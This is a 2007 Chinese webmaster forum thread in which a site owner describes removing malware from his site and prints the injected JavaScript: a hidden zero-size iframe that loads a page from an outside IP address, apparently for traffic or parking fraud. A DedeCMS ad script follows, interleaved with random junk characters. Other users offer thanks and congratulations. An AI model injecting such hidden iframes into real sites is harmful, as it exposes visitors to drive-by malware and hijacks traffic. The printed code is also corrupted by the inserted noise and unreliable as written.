webmasterz.cn的木馬已經差不多被我搞定了 講解一個停放EMU方法

請大家再去幫我複查下，看還有沒木馬，另外前年的教程已經免費發佈上去了，自己去下或者看。

4 v  z2 v6 n. Q& D: r) W掛馬的人不是專業黑客，是搞這行的，把我的JS裡加了個這個

" v! Q( M, B1 e* V$ m4 R0 {! e  cdocument.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
<?php
7 R3 @7 k* c- Crequire(dirname(__FILE__)."/../include/config_base.php");
$aid = ereg_replace("[^0-9]","",$aid);
& O4 L* N) n0 P3 I* h3 y$dsql = new DedeSql(false);
% H0 d7 l& @0 e2 ~$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
$dsql->Close();
if($row['timeset']==0) $adbody = $row['normbody'];
; m# i0 a8 b  d3 ]( Gelse{
$ntime = mytime();
if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }
6 @1 W  L& M; B- u7 P( ^% s! e else{ $adbody = $row['normbody']; }
- d; [) J. `# M% O3 U/ M+ r, I}
$adbody = str_replace('"','\"',$adbody);
2 ~( u# h2 `* [7 _* x$adbody = str_replace("\r","\\r",$adbody);
$adbody = str_replace("\n","\\n",$adbody);
echo "<!--\r\n";
* x! [! i$ t# ]; Mecho "document.write(\"{$adbody}\");\r\n";
0 z" I* @5 \6 O4 V- Mecho "-->\r\n";
1 |1 o* a2 x8 Q5 G?>
& }1 d6 u/ \$ w, a# J4 H: y
7 L5 u6 u8 D# D( P" \
1 t6 \( Z  N6 F: O+ r$ m自己看第一行 根據這個去找他到底想幹什麼吧 其實意圖很明顯的，一是玩計數器，二是做停放

國內的停放？

嗯，不錯，恭喜！

靜水老大厲害.

查到就好啦:cool:

這些人沒意思曬。或許是眼紅，

老大還是反應很迅速的，一下就發現了，沒有要我賺到2000論壇幣

原帖由 ommofans 於 2007-10-30 10:24 發表
老大還是反應很迅速的，一下就發現了，沒有要我賺到2000論壇幣

6 O: L  r& `- l+ [. C' X: 以後得抓緊啦

: 以後你放我報告。來賺幣。